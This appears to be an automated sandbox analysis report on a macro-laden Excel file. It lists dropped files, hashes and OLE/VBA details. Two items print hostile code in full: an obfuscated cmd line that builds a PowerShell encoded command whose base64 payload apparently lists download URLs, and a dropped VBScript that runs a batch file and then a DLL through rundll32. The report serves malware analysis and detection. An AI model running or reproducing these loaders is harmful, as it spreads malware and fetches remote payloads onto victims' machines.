Preview:	dir c:\&echo zdrfsgESTGaw3sryzsdfgzsdertfsjehgfskug3kjshgegZSFHdrHzDSS356tzgd&SET hjhdrdresas=po&echo DGsg4e6ysxdfhzxdfggDHdrthdrx dhDthDghDRtgsd45ydxfh&SET YUderhdD3=wers&echo dgbkw4tdgfTGHJ5rs6dt hse547thxDFXHtgjfxdtrgdfhxdfgf&SET VvdsFHd4=hell -e&echo Has4htksdighfdGJSXDghs4tshdkrg zasg3ksjfHXGHJXdfezse34&SET HJtre4edtgf=nc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8A&echo Fghsdregsh3ksjdfhkgzfHGhjXdgzs4tjsrhdfkjgdkjzkjhk4jdksrjgcvbnw34&

C:\ProgramData\vbkwk.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	HTML document, ASCII text, with very long lines (45622)
Category:	dropped
Size (bytes):	137999
Entropy (8bit):	5.203283576911267
Encrypted:	false
SSDEEP:	1536:hnAlnbJeHUapcTE7mAwNRbi3f32VWgPbDA2dp+VWbPbQAMdG3VWjPb2AkdgyVW3W:y6HwM0QIgy98xTsApA
MD5:	8DA83A1C2086D7161C51EAC86FC5C4EB
SHA1:	74F790913BACC452BA2F56B2C4254ECC7D18D382
SHA-256:	9FEB7A33D3B04BA2B308BE4CFDFA31550970B87CFD5D8FE83E650174D3EABE3E
SHA-512:	B5CF2E9D897CF526CD0439E757A94F3C7D8FFE7FA4A29D369F2D969EFA60384195170F5A0E8FDCEB248EE5BB06222DBDBF312A8DF24747BC365A5960F3FE1D79
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="en-US">.<head>.<meta charset="UTF-8">.<meta name="viewport" content="width=device-width, initial-scale=1">.. <link rel="profile" href="https://gmpg.org/xfn/11"> .. <title>Data Square for IT Solutions – Together, we make our success</title>.<meta name='robots' content='max-image-preview:large' />.<link rel='dns-prefetch' href='//www.googletagmanager.com' />.<link rel="alternate" type="application/rss+xml" title="Data Square for IT Solutions » Feed" href="https://datasits.com/?feed=rss2" />.<link rel="alternate" type="application/rss+xml" title="Data Square for IT Solutions » Comments Feed" href="https://datasits.com/?feed=comments-rss2" />.<script>.window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/datasits.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}};./*! T

C:\ProgramData\wetidjks.vbs

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with very long lines (587), with CRLF line terminators
Category:	modified
Size (bytes):	589
Entropy (8bit):	4.868734838507147
Encrypted:	false
SSDEEP:	12:v/UG/VyIHSeXSV/r1Y/055gxYLFizjQL1z0r1DmhbnUzzUKeX:njVDSeiVD1Y/kgxYLYzje1y1QbUzzUD
MD5:	DD3DB5E3DFE696A3DE4220F803EFE671
SHA1:	F5D994A022D94D4B3B8A05DC7D8AF5F843E9B00C
SHA-256:	EC96C900EDAE5819EADFA96DA0D02B1E6488C51E085993479961522E3011B014
SHA-512:	8A60A7787901A91019966E7597ECDC9023A0DDABEC7521BD276B4E710258AAFF851CBA462D12890908CD9FF34447A407D81ED242FC3F9A75930177CB8F5864DD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	Dim fhnl213klsd:Set fhnl213klsd=wsCriPt.creAteobJEct(replace("WDqhnuioSDqhnuiocrDqhnuioipDqhnuiot.DqhnuioSDqhnuiohDqhnuioelDqhnuiol","Dqhnuio","")):jlwkhdelsdgk=replace("Gswec:Gswe\pGsweroGswegramGswedaGswetGswea\jledshf.bGsweat","Gswe",""):fhnl213klsd.rUn jlwkhdelsdgk,0,true:indlhwkjhks=rePLace("cGswemGswed Gswe/Gswec sGswetGswearGswet Gswe/GsweB GswecGswe:Gswe\wGsweinGswedGsweowGswes\sGsweysGswewGsweoGswew6Gswe4\rGsweundlGswel3Gswe2.eGswexGswee cGswe:Gswe\pGsweroGswegraGswemdGsweatGswea\vbkwk.dGswelGswel,dfsgeresd","Gswe",""):fhnl213klsd.ruN indlhwkjhks,0:Set fhnl213klsd=nothing..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6916
Entropy (8bit):	4.765218321768022
Encrypted:	false
SSDEEP:	192:Mxoe5AVFn3eGOVpN6K3bkkjo58gkjDt4iWN3yBGH+dcU6CIVsm5emd:RVoGIpN6KQkj2Lkjh4iUxV
MD5:	665354A1A9139D1FA96E6FCC7F1FCE73
SHA1:	8477F42550FBBA457D4015AAAC889272C7FAF1D8
SHA-256:	146FDB9501A06132126EE69A643DDBF1222DE922D3B59E282BDE97AF5186CD01
SHA-512:	F61A4F30A60A5F63619467D31D928ED428119EB4783ECFA7938A2213B879B3B17DD231389386319F5E756C0CDD075FF5B861646ECFF791D8AD1EA152F2B045CD
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........&.w.....w...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1^.......Test-Path........Limit-EventLog........Show-ControlPanelItem........Get-Content........Rename-

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\0id5ifws.ib3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	147284
Entropy (8bit):	4.421599477059889
Encrypted:	false
SSDEEP:	1536:C8VL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:C2JNSc83tKBAvQVCgOtmXmLpLmB
MD5:	ACE99A038B1629BEC8EBD32C2126C500
SHA1:	0D74252AB3C7FBE97866D99AABA7BFA5C4CE404F
SHA-256:	5EEC501F1E7015D2EDEE330BA3478D4F410D77969E800B5C7090DD04B44FD805
SHA-512:	0B8865F93904EB5274B878C1D0CD42DC2D5262DB162EB964B17111CA9A9159EE788C470639FB2C9178816F74246F3C73F5C71BCEBDC93173BDE69733C4EC70A0
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................

C:\Users\user\AppData\Local\Temp\bke2j5og.tns.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\hieg3o1z.kn0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\jynxjtqa.ad3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\u4rta33w.s1l.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\uia5dhtc.x3m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DF13F08B5AA593F3CF.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	3.353426539723395
Encrypted:	false
SSDEEP:	768:WcKoSsxz1PDZLDZjlbR868O8KldzH3dehvMqAPjxO5xyZUE5V5xtezEV/48/dgA/:WcKoSsxz1PDZLDZjlbR868O8KlVH3dek
MD5:	2884E8CEDF2203ECFBCEBA9B99C9BF49
SHA1:	CA0E360A0D53F311FDBE3A7472E8307AC58C0D1A
SHA-256:	FE043D6AAF808D27EEC1085070C0A674C234AAB52C497C551FBDD55BF0226DA6
SHA-512:	3B783C71C9BB8BF35EF4B4B0E01AE74AFE1B133CDF1009D4521BDCD7AFAA3297FE4B9626C8EF539DF436E53419EEFB59588541B1EA8E1B41890751531584529D
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF19A285229F022692.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF37CAD9B92CF722FF.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF498607F26789DF58.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF604FCF5437480BE4.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	F4F35D60B3CC18AAA6D8D92F0CD3708A
SHA1:	6FECD5769C727E137B7580AE3B1823B06EE6F9D9
SHA-256:	2AAE7DC846AAF25F1CADF55F1666862046C6DB9D65D84BDC07FA039DAC405606
SHA-512:	A69E2DCE2F75771C63ACDA51E4AEECC95B00F65377E3026BAF93A6CFB936BF6F10CB320CC09B0E43EB7833D062B24EFC5932569A1826E55DBB736CCDA0BEB413
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF93DA11A6F6B09AA3.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF8C88563BA72F0E8.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.8237575746697297
Encrypted:	false
SSDEEP:	24:rkbyEal3Z2vdalzY70SaLClfCa1gWt5uHoYnR:rSa6duzBCf1zvuIYR
MD5:	51FAD4B370BBD243FBAC611EE850C506
SHA1:	D52EF1A391C0DD04A86CBA4186787779A6FC5195
SHA-256:	D69378451D960E3ADA20CE9081C2B6AC0DC177E5F14EC51CCE76662002B5EDF3
SHA-512:	BE6C90AE9C6BEA2BF4AB1648ADDB4C9FBC6373601329C941B86AD15C4E1ABA560705E3C37AE1847D6ECBC685DD530F122C8DC6087D99A90E20842DB36C4D055F
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\13E20000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: User, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Nov 7 17:29:24 2024, Security: 0
Category:	dropped
Size (bytes):	211968
Entropy (8bit):	6.396635298383129
Encrypted:	false
SSDEEP:	6144:5cKoSsxzNDZLDZjlbR868O8KL5L+Ik3hOdsylKlgryzc4bNhZF+E+W2knASbtPIZ:ZrSVHeyNsusHILUAb
MD5:	E33F87305B709202103EBB19C3396998
SHA1:	4291918CF1DF149EC9CCF2AB9EEABF88B83E04B9
SHA-256:	AA39D8605BBF0A1E33CC32351F88FECD92C5173A71117F2E03E1F42BCDE09B22
SHA-512:	E2EA1FFD1DA199275B4CA6493B1E5964E567B1D76F33274116E6296952F6E055DD0391583DE8677DA4A2814048838DC4EC6E0A1E4E1D802285EA35C3C1AFAAE4
Malicious:	false
Preview:	......................>.......................................................b........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...c.......d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\13E20000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\ABE80F60.tmp (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: User, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Wed Feb 2 17:45:16 2022, Security: 0
Category:	dropped
Size (bytes):	161280
Entropy (8bit):	6.8234823194846905
Encrypted:	false
SSDEEP:	3072:McKoSsxzNDZLDZjlbR868O8KlVH3dehvMqAPjxO5xyZUE5V5xtezEVg8/dgnGx0U:McKoSsxzNDZLDZjlbR868O8KlVH3dehC
MD5:	BEE11B9789484D78306CD10C2C1A38DE
SHA1:	3BB01002AD1DC3DAA7AB4984513B82338DEB7851
SHA-256:	5C8C8C898204403E6CE3EDF277470A6062053C500BF114977C322E3971A9C5F0
SHA-512:	DBCD5587AF215A14940FA3139673FE687C17EA600DDFCE69ADD434BB1BFE50D4E840D5EE3ECA766B6D22AF87DF3572D9E1CCD42730EB19420F27A3A126699BF5
Malicious:	false
Preview:	......................>.......................................................b........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...c.......d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\xxTupY4Fr3.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: User, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Wed Feb 2 17:45:16 2022, Security: 0
Category:	dropped
Size (bytes):	161280
Entropy (8bit):	6.8234823194846905
Encrypted:	false
SSDEEP:	3072:McKoSsxzNDZLDZjlbR868O8KlVH3dehvMqAPjxO5xyZUE5V5xtezEVg8/dgnGx0U:McKoSsxzNDZLDZjlbR868O8KlVH3dehC
MD5:	BEE11B9789484D78306CD10C2C1A38DE
SHA1:	3BB01002AD1DC3DAA7AB4984513B82338DEB7851
SHA-256:	5C8C8C898204403E6CE3EDF277470A6062053C500BF114977C322E3971A9C5F0
SHA-512:	DBCD5587AF215A14940FA3139673FE687C17EA600DDFCE69ADD434BB1BFE50D4E840D5EE3ECA766B6D22AF87DF3572D9E1CCD42730EB19420F27A3A126699BF5
Malicious:	false
Preview:	......................>.......................................................b........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...c.......d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\~$xxTupY4Fr3.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: User, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Wed Feb 2 17:45:16 2022, Security: 0
Entropy (8bit):	6.982491526903877
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	xxTupY4Fr3.xlsx
File size:	154'112 bytes
MD5:	b8410c9949aca2147a5bc2cbf301dc96
SHA1:	de0e224114985b4c013485302d4008736612a023
SHA256:	b4f9e80839564b06b9887f79b31d0f017335e286aa610191b317794bff88f9ae
SHA512:	db6eeb0171ace0c41be93a5e66b0ed14b3ce17786ec5d9bf2197412eb1574948120adb7a266e2eb8869d64d1edce0470cf0258f4b8c089cf44a86340a8e84b1f
SSDEEP:	3072:McKoSsxzNDZLDZjlbR868O8KlVH3dehvMqAPjxO5xyZUE5V5xtezEVg8/dgnGx0b:McKoSsxzNDZLDZjlbR868O8KlVH3deht
TLSH:	7DE36B2576C5D9CADB0822351ACACAEE3327BC479E7643C33158F31D2DBB1909AD2746
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "xxTupY4Fr3.xlsx"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1251
Author:	User
Last Saved By:	1
Create Time:	2015-06-05 18:17:20
Last Saved Time:	2022-02-02 17:45:16
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: bDSFgs4ysustjshgs.frm, Stream Size: 4352

General
Stream Path:	_VBA_PROJECT_CUR/VBA/bDSFgs4ysustjshgs
VBA File Name:	bDSFgs4ysustjshgs.frm
Stream Size:	4352
Data ASCII:	. . . . . . . . . . . . . . . . . . + . . . i . . . . . . . . . . . . . . 7 v R . . . . . . . . . . . . . . . . . . . . h . . . / / l r K f p . R 8 < . 8 D ` * l H . . 6 K L H z . V . . . . 5 V H 7 . . . . . . . . . . . . . . . . . . . . . . . . x . . . . 5 V H 7 . . / / l r K f p . R 8 < . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S P . . . . S . . . . . S . . . . . S . . . . . . . . . . . 6 " . . . . . < . . . . . . . < . . . . . . . . . . . 0 . { . F . 1 . E . 3 . 0 . 3
